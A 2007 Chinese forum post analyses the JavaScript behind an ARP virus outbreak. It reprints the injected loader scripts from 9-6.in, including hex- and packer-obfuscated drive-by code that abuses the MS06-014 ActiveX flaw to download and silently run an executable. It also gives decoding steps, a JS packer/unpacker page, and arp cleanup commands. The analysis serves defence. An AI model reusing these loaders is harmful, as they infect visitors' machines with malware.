解析arp病毒背后利用的Javascript技术附解密方法

本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁!

最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都无法上网,给工作带来了很大的不方便,在这里写下杀毒的过程,希望对大家能有帮助!

现象:打开部分网页显示为乱码,好像是随机的行为,但是看似又不是,因为它一直在监视msn.com,呵呵,可能和微软有仇吧,继续查看源代码,发现头部有一个js文件链接----<script src=http://9-6.in/n.js></script>;

来源:经过一番网络搜索,发现这个域名是印度域名,而IP地址却是美国的,而且域名的注册日期是7月25日,看来一切都是预谋好了的,还是不管这个了,先解决问题吧;

分析:
1、先把(http://9-6.in/n.js)这个JS文件下载下来,代码如下: 

    document.writeln("<script>window.onerror=function(){return true;}<//script>");
    document.writeln("<script src=/"http:////9-6.in//S368//NewJs2.js/"><//script>");
    document.writeln("<script>");
    document.writeln("function StartRun(){");
    document.writeln("var Then = new Date() ");
    document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
    document.writeln("var cookieString = new String(document.cookie)");
    document.writeln("var cookieHeader = /"Cookie1=/" ");
    document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
    document.writeln("if (beginPosition != -1){ ");
    document.writeln("} else ");
    document.writeln("{ document.cookie = /"Cookie1=POPWINDOS;expires=/"+ Then.toGMTString() ");
    document.writeln("document.write(/'<iframe width=0 height=0 src=/"http:////9-6.IN//s368//T368.htm/"><//iframe>/');");
    document.writeln("}");
    document.writeln("}");
    document.writeln("StartRun();");
    document.writeln("<//script>")
其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉,真够狠的,呵呵,不这样怎么隐藏自己呢,哈哈!然后还有个JS文件http://9-6.in/S368/NewJs2.js,先继续往下看,找到StartRun();运行一个函数,函数的主要作用是写COOKIE,日期为保存一天,然后还用隐藏框架加载了一个文件(http://9-6.IN/s368/T368.htm),其余就没有什么特别的了;
2、下载(http://9-6.in/S368/NewJs2.js)这个文件,代码如下:

StrInfo =  "/x3c/x73/x63/x72/x69/x70/x74/x3e/x77/x69/x6e/x64/x6f/x77/x2e/x6f/x6e/x65/x72/x72/x6f/x72/x3d/x66/x75/x6e/x63/x74/x69/x6f/x6e/x28/x29/x7b/x72/x65/x74/x75/x72/x6e /x74/x72/x75/x65/x3b/x7d/x3c/x2f/x73/x63/x72/x69/x70/x74/x3e" +"/n"+
  "/x3c/x73/x63/x72/x69/x70/x74/x3e" +"/n"+
  " /x44/x5a/x3d/'///x78/x36/x38///x78/x37/x34///x78/x37/x34///x78/x37/x30///x78/x33/x41///x78/x32/x46///x78/x32/x46///x78/x33/x39///x78/x32/x44///x78/x33/x36///x78/x32/x45///x78/x36/x39///x78/x36/x45///x78/x32/x46///x78/x35/x33///x78/x33/x33///x78/x33/x36///x78/x33/x38///x78/x32/x46///x78/x35/x33///x78/x33/x33///x78/x33/x36///x78/x33/x38///x78/x32/x45///x78/x36/x35///x78/x37/x38///x78/x36/x35/'/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x66/x75/x6e/x63/x74/x69/x6f/x6e /x47/x6e/x4d/x73/x28/x6e/x29 " +"/n"+
  "/x7b " +"/n"+
  " /x76/x61/x72 /x6e/x75/x6d/x62/x65/x72/x4d/x73 /x3d /x4d/x61/x74/x68/x2e/x72/x61/x6e/x64/x6f/x6d/x28/x29/x2a/x6e/x3b" +"/n"+
  " /x72/x65/x74/x75/x72/x6e /'///x78/x37/x45///x78/x35/x34///x78/x36/x35///x78/x36/x44///x78/x37/x30/'/x2b/x4d/x61/x74/x68/x2e/x72/x6f/x75/x6e/x64/x28/x6e/x75/x6d/x62/x65/x72/x4d/x73/x29/x2b/'///x78/x32/x45///x78/x37/x34///x78/x36/x44///x78/x37/x30/'/x3b" +"/n"+
  "/x7d " +"/n"+
  " /x74/x72/x79 " +"/n"+
  "/x7b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x76/x61/x72 /x42/x66/x3d/x64/x6f/x63/x75/x6d/x65/x6e/x74/x2e/x63/x72/x65/x61/x74/x65/x45/x6c/x65/x6d/x65/x6e/x74/x28/"///x78/x36/x46///x78/x36/x32///x78/x36/x41///x78/x36/x35///x78/x36/x33///x78/x37/x34/"/x29/x3b" +"/n"+
  " /x42/x66/x2e/x73/x65/x74/x41/x74/x74/x72/x69/x62/x75/x74/x65/x28/"///x78/x36/x33///x78/x36/x43///x78/x36/x31///x78/x37/x33///x78/x37/x33///x78/x36/x39///x78/x36/x34/"/x2c/"///x78/x36/x33///x78/x36/x43///x78/x37/x33///x78/x36/x39///x78/x36/x34///x78/x33/x41///x78/x34/x32///x78/x34/x34///x78/x33/x39///x78/x33/x36///x78/x34/x33///x78/x33/x35///x78/x33/x35///x78/x33/x36///x78/x32/x44///x78/x33/x36///x78/x33/x35///x78/x34/x31///x78/x33/x33///x78/x32/x44///x78/x33/x31///x78/x33/x31///x78/x34/x34///x78/x33/x30///x78/x32/x44///x78/x33/x39///x78/x33/x38///x78/x33/x33///x78/x34/x31///x78/x32/x44///x78/x33/x30///x78/x33/x30///x78/x34/x33///x78/x33/x30///x78/x33/x34///x78/x34/x36///x78/x34/x33///x78/x33/x32///x78/x33/x39///x78/x34/x35///x78/x33/x33///x78/x33/x36/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x4b/x78/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"///x78/x34/x44///x78/x36/x39///x78/x36/x33///x78/x37/x32///x78/x36/x46///x78/x37/x33///x78/x36/x46///x78/x36/x36///x78/x37/x34///x78/x32/x45///x78/x35/x38/"/x2b/"///x78/x34/x44///x78/x34/x43///x78/x34/x38///x78/x35/x34///x78/x35/x34///x78/x35/x30/"/x2c/"/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x41/x53/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"///x78/x34/x31///x78/x36/x34///x78/x36/x46///x78/x36/x34///x78/x36/x32///x78/x32/x45///x78/x35/x33///x78/x37/x34///x78/x37/x32///x78/x36/x35///x78/x36/x31///x78/x36/x44/"/x2c/"/"/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x41/x53/x2e/x74/x79/x70/x65/x3d/x31/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4b/x78/x2e/x6f/x70/x65/x6e/x28/"///x78/x34/x37///x78/x34/x35///x78/x35/x34/"/x2c /x44/x5a/x2c/x30/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4b/x78/x2e/x73/x65/x6e/x64/x28/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4e/x73/x31/x3d/x47/x6e/x4d/x73/x28/x39/x39/x39/x39/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x76/x61/x72 /x63/x46/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"///x78/x35/x33///x78/x36/x33///x78/x37/x32///x78/x36/x39///x78/x37/x30///x78/x37/x34///x78/x36/x39///x78/x36/x45///x78/x36/x37///x78/x32/x45///x78/x34/x36///x78/x36/x39///x78/x36/x43///x78/x36/x35///x78/x35/x33///x78/x37/x39///x78/x37/x33///x78/x37/x34///x78/x36/x35///x78/x36/x44///x78/x34/x46///x78/x36/x32///x78/x36/x41///x78/x36/x35///x78/x36/x33///x78/x37/x34/"/x2c/"/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x4e/x73/x54/x6d/x70/x3d/x63/x46/x2e/x47/x65/x74/x53/x70/x65/x63/x69/x61/x6c/x46/x6f/x6c/x64/x65/x72/x28/x30/x29/x3b /x4e/x73/x31/x3d /x63/x46/x2e/x42/x75/x69/x6c/x64/x50/x61/x74/x68/x28/x4e/x73/x54/x6d/x70/x2c/x4e/x73/x31/x29/x3b /x41/x53/x2e/x4f/x70/x65/x6e/x28/x29/x3b/x41/x53/x2e/x57/x72/x69/x74/x65/x28/x4b/x78/x2e/x72/x65/x73/x70/x6f/x6e/x73/x65/x42/x6f/x64/x79/x29/x3b" +"/n"+
  " /x41/x53/x2e/x53/x61/x76/x65/x54/x6f/x46/x69/x6c/x65/x28/x4e/x73/x31/x2c/x32/x29/x3b /x41/x53/x2e/x43/x6c/x6f/x73/x65/x28/x29/x3b /x76/x61/x72 /x71/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"///x78/x35/x33///x78/x36/x38///x78/x36/x35///x78/x36/x43///x78/x36/x43///x78/x32/x45///x78/x34/x31///x78/x37/x30///x78/x37/x30///x78/x36/x43///x78/x36/x39///x78/x36/x33///x78/x36/x31///x78/x37/x34///x78/x36/x39///x78/x36/x46///x78/x36/x45/"/x2c/"/"/x29/x3b" +"/n"+
  " /x6f/x6b/x31/x3d/x63/x46/x2e/x42/x75/x69/x6c/x64/x50/x61/x74/x68/x28/x4e/x73/x54/x6d/x70/x2b/'///x78/x35/x43///x78/x35/x43///x78/x37/x33///x78/x37/x39///x78/x37/x33///x78/x37/x34///x78/x36/x35///x78/x36/x44///x78/x33/x33///x78/x33/x32/'/x2c/'///x78/x36/x33///x78/x36/x44///x78/x36/x34///x78/x32/x45///x78/x36/x35///x78/x37/x38///x78/x36/x35/'/x29/x3b" +"/n"+
  " /x71/x2e/x53/x48/x65/x4c/x4c/x45/x78/x65/x63/x75/x74/x65/x28/x6f/x6b/x31/x2c/'///x78/x32/x30///x78/x32/x46///x78/x36/x33 /'/x2b/x4e/x73/x31/x2c/"/"/x2c/"///x78/x36/x46///x78/x37/x30///x78/x36/x35///x78/x36/x45/"/x2c/x30/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x7d " +"/n"+
  " /x63/x61/x74/x63/x68/x28/x4d/x73/x49/x29 /x7b /x4d/x73/x49/x3d/x31/x3b /x7d" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x3c/x2f/x73/x63/x72/x69/x70/x74/x3e"
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"](StrInfo);
这个代码有点长哦,而且有保护措施,全部转换为十六进制,不过不要害怕,我们有办法解决,首先得确保你已经安装了UE,然后打开UE,把代码粘贴进去(废话,呵呵),把/x替换为%,然后用html代码转换功能,解码,就可以得到第一次解码的代码,第一次???,呵呵,这个代码的作者很变态的,做了两次编码,所以我得进行两次解码才行,重复刚才的步骤,然后你就可以看到最终的“原始”代码了;
具体的代码我就不帖出来了,有一定的危害性,相信大家看了上面的步骤都能自己找到代码,这里之说一下比较核心的代码吧;

[Copy to clipboard] [ - ]CODE:
//核心代码
..............
  " var Bf=document.createElement(/"/o/b/j/e/c/t/");" +"/n"+
  " Bf.setAttribute(/"/c/l/a/s/s/i/d/",/"/c/l/s/i/d/:/B/D/9/6/C/5/5/6/-/6/5/A/3/-/1/1/D/0/-/9/8/3/A/-/0/0/C/0/4/F/C/2/9/E/3/6/");" +"/n"+
  " var Kx=Bf.CreateObject(/"/M/i/c/r/o/s/o/f/t/./X/"+/"/M/L/H/T/T/P/",/"/");" +"/n"+
  " var AS=Bf.CreateObject(/"/A/d/o/d/b/./S/t/r/e/a/m/",/"/");" +"/n"+
.............
  " var cF=Bf.CreateObject(/"/S/c/r/i/p/t/i/n/g/./F/i/l/e/S/y/s/t/e/m/O/b/j/e/c/t/",/"/");" +"/n"+
  " var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" +"/n"+
  " AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject(/"/S/h/e/l/l/./A/p/p/l/i/c/a/t/i/o/n/",/"/");" +"/n"+
  " ok1=cF.BuildPath(NsTmp+/'/////s/y/s/t/e/m/3/2/',/'/c/m/d/./e/x/e/');" +"/n"+
  " q.SHeLLExecute(ok1,/'/ ///c /'+Ns1,/"/",/"/o/p/e/n/",0);" +"/n"+
..............
上面的就是最为核心的代码,利用MS0614漏洞、创建JS异步对象获取病毒(*.exe)文件,然后运行,这样就达到它的目的啦!
3、打开http://9-6.IN/s368/T368.htm查看源代码,又发现一段怪异的JS文件,如下:

[Copy to clipboard] [ - ]CODE:
<script>
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('x("//0//6//9//5//i//h//j//j//4//f//8//3//2//0//7//1//i//8//2//3//h//g//4//w//v//u//t//b//s//7//r//g//4//e//f//q//8//3//2//0//7//1//e//4//d//c//d//c//p//5//3//o//n//a//6//1//b//m//2//0//1//a//l//0//6//9//5//k")',34,34,'151|164|162|143|42|157|156|160|163|146|145|56|12|15|76|74|134|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123|eval'.split('|'),0,{}))
</script>



本帖最近评分记录
bound0   2007-8-6 19:01   威望   +1   鼓励研究精神!:D 

 引用  报告 回复  心中有梦 
[广告] 【万网邮箱DIY,灵活购买】| 西部数码多线虚拟主机全国10强 

veking [楼主] 

蓝色水 
高级会员


帖子 275
体力 733 
威望 1 
注册 2005-6-16
 #2发表于 2007-8-6 16:06  资料  短消息  加为好友      
解析arp病毒背后利用的Javascript技术


可以看出这段代码也是经过加密的了,特征为function(p,a,c,k,e,d),这种加密方法网上有很多例子,我就不细说了,附上解密代码:

[Copy to clipboard] [ - ]CODE:
//以下代码为网上搜索所得,版权归原作者所有
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
</head>
<body>
<script>
a=62;  
function encode() { 
var code = document.getElementById('code').value; 
code = code.replace(/[/r/n]+/g, ''); 
code = code.replace(/'/g, "//'"); 
var tmp = code.match(//b(/w+)/b/g); 
tmp.sort(); 
var dict = []; 
var i, t = ''; 
for(var i=0; i<tmp .length; i++) { 
   if(tmp[i] != t) dict.push(t = tmp[i]); 

var len = dict.length; 
var ch; 
for(i=0; i<len; i++) { 
   ch = num(i); 
   code = code.replace(new RegExp('//b'+dict[i]+'//b','g'), ch); 
   if(ch == dict[i]) dict[i] = ''; 

document.getElementById('code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'////w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('////b'+e(c)+'////b','g'),k[c]);return p}(" 
   + "'"+code+"',"+a+","+len+",'"+ dict.join('|')+"'.split('|'),0,{}))"; 


function num(c) { 
return(c<a ?'':num(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36)); 


function run() { 
eval(document.getElementById('code').value); 

function decode() { 
var code = document.getElementById('code').value; 
code = code.replace(/^eval/, ''); 
document.getElementById('code').value = eval(code); 

</script> 
<textarea id=code cols=80 rows=20> 

</textarea><br /> 
<input type=button onclick=encode() value=编码/> 
<input type=button onclick=run() value=执行/> 
<input type=button onclick=decode() value=解码/>
</body>
</html>
经过解密后代码为:

[Copy to clipboard] [ - ]CODE:
info =        "<script src=/"S368.jpg/"></script>"
document.write(info)
继续打开这个表面象图片的链接,呵呵,当然不会是MM图片了,查看源代码,找到如下代码:

[Copy to clipboard] [ - ]CODE:
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('E n=1c;12 13(){}12 14(){1d{n=1e 1f("//K//l//r//8//i//3//6//j//3//6//o//3//6//9//C//3//s//K//l//r//8//i//3//6//9//x")}1g(e){Q}E a=n["//15//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//R//7//q//3//v//5//4//l","");1h(a["//7//8//i//3//y//L//m"]("//z//f//l//4//5//9//3//y//3")!=-1){Q}E b=n["//15//3//4//j//3//6//o//3//6//v//5//4//l"]();b=b["//f//r//s//f//4//6"](0,2);b+="//////v//6//d//k//6//5//J//x//////K//l//r//8//i//3//J//x//////1i//3//s//K//l//r//8//i//3//6//////A//6//d//m//7//q//3//f//////r//f//3//6//h//d//8//m//7//k//9//7//8//7";n["//j//3//4//p//5//q//q//s//5//h//1j//F//8//4//6//D"](1k,13);E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//7");E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//5");E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//s");E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//h");E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//i");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//7","//S//f//h//6//7//A//4//16//o//5//6 //f//G//8//3//C //w//h//4//7//o//3//N//L//s//T//3//h//4//t//"//C//f//h//6//7//A//4//9//f//l//3//q//q//"//u//g//o//5//6 //d//G//8//3//C //w//h//4//7//o//3//N//L//s//T//3//h//4//t//"//f//l//3//q//q//9//5//A//A//q//7//h//5//4//7//d//8//"//u//g//o//5//6 //5//B//s//B//h//B//i//B//3//B//m//B//k//g");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//5","//H//g//f//9//U//r//8//t//"//p//V//////////v//6//d//k//6//5//J//x//////////I//8//4//3//6//8//J//x//////////I//F//N//v//17//L//U//F//9//F//N//F //l//4//4//A//1l//O//O//h//1m//x//W//7//18//O//j//X//19//1a//O//i//1n//C//18//Y//Y//W//l//4//Y//1o//"//B//H//B//H//u//g//f//9//U//r//8//t//"//h//z//i//9//3//y//3 //Z//h //4//6//3//3 //h//V//////// //Z//m//"//B//H//B//x//u//g");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//s","//f//9//j//A//3//h//7//5//q//R//d//q//i//3//6//f//t//"//1p//D//1q//d//h//r//z//3//8//4//f//"//u//g//s//G//s//9//f//r//s//f//4//6//7//8//k//t//H//B//s//9//q//5//f//4//I//8//i//3//y//L//m//t//"//////////"//u//u//g//s//P//G//"//////////q//d//h//5//q//f//J//x//////////K//3//z//A//d//6//J//x//////////p//d//8//4//3//8//4//9//I//F//1r//////////"//g");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//h","//d//9//1s//5//z//3//j//A//5//h//3//t//s//u//g//m//d//6//t//5//G//H//g//5//S//h//9//I//4//3//z//f//t//u//9//p//d//r//8//4//g//5//P//P//u//10 //o//5//6 //m//G//h//9//I//4//3//z//f//t//u//9//I//4//3//z//t//5//u//9//v//5//4//l//g//m//P//G//"//////////j//X//19//1a//1b//1t//x//1u//W//3//y//3//"//g");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//i","//H//g//4//6//D//10//f//9//F//y//3//h//t//m//u//g//11//h//5//4//h//l//t//3//u//10//11//g//11//C//7//8//i//d//C//9//h//q//d//f//3//t//u//g//S//Z//f//h//6//7//A//4//16");n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//v//6//d//4//3//h//4","//x");n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//R//7//q//3//v//5//4//l","//h//V//////C//7//8//i//d//C//f//////f//D//f//4//3//z//X//1b//////z//f//l//4//5//9//3//y//3");n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//v//5//6//5//z//3//4//3//6",b);n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//F//y//4//17//7//f//4","//9//6//5//6//g//9//M//7//A//g//9//3//y//3//g//9//i//d//h//g//9//h//d//z//g//9//s//7//8//g//9//k//M//g//9//M//g//9//4//5//6//g//9//5//6//T//g//9//q//M//l//g//9//f//7//4//g//9//l//1v//y//g//9//4//k//M//g//9//i//q//q//g//9//d//h//y//g//9//o//s//y//g");n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//1w//f//3//6//j//3//4","//x");Q}14();',62,95,'|||x65|x74|x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50|x41|x31|x78|x6d|x70|x2c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|x58|x2F|x2b|return|x46|x3c|x6a|x52|x3a|x2E|x33|x6D|x2f|x7b|x7d|function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|null|try|new|ActiveXObject|catch|if|x57|x6b|106|x3A|x6B|x6F|x6C|x4d|x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))
又是好长的代码,又发现了function(p,a,c,k,e,r),继续解码,代码很长,请大家自己解码查看吧,这里应用的还是上面的手法,用加密函数加密,然后转换为十六进制,尽最大努力混淆我们的视线,来达到不可告人的目的,这里的代码的主要作用是用另外一种方法下载病毒并运行,思想真的很先进,居然是去调用Web迅雷来下载病毒,然后去运行,作者真的是煞费苦心啊,应用了两种方法下载病毒,“小样,就不信毒不倒你!”,呵呵
杀毒:说了半天只是分析了一下ARP病毒发作的时候在干什么,下面就说下关于杀毒的问题,其实现在网上有很多这方面的相关教程,我就简单总结一下我的杀毒过程吧;
1、中了arp病毒必须要先找到中毒的机器
2、给这个机器断网、杀毒
3、恢复局域网
其中第一步最关键了,如何才能找到呢?
在局域网随便一台客户机上打开网上邻居,查看工作组计算机,然后等到列表刷新出来后,迅速点击开始-->运行-->cmd-->arp -a回车,如果机器比较多,请多输入几次arp -a,然后仔细查看,你会发现有一台机器的Mac地址和网关的Mac地址相同,恭喜你,这就是那个毒源!
到这台机器的跟前(呵呵,废话真多),剩下的工作相信大家都有很多经验了吧,杀毒!装杀毒软件或者进安全模式更甚者重装机器,总之把病毒干掉就行了;
最后,到不能打开网页的机器上执行这个命令:点击开始-->运行-->cmd-->arp -d回车,然后就可以了。、

终于一切又恢复了平静,是不是很有成就感呢,呵呵!

本人的第一篇正式的BLOG技术文章终于写完了,希望大家能喜欢看!  

JavaScript技术解析arp病毒背后利用的Javascript技术附解密方法,转载需保留来源!

郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。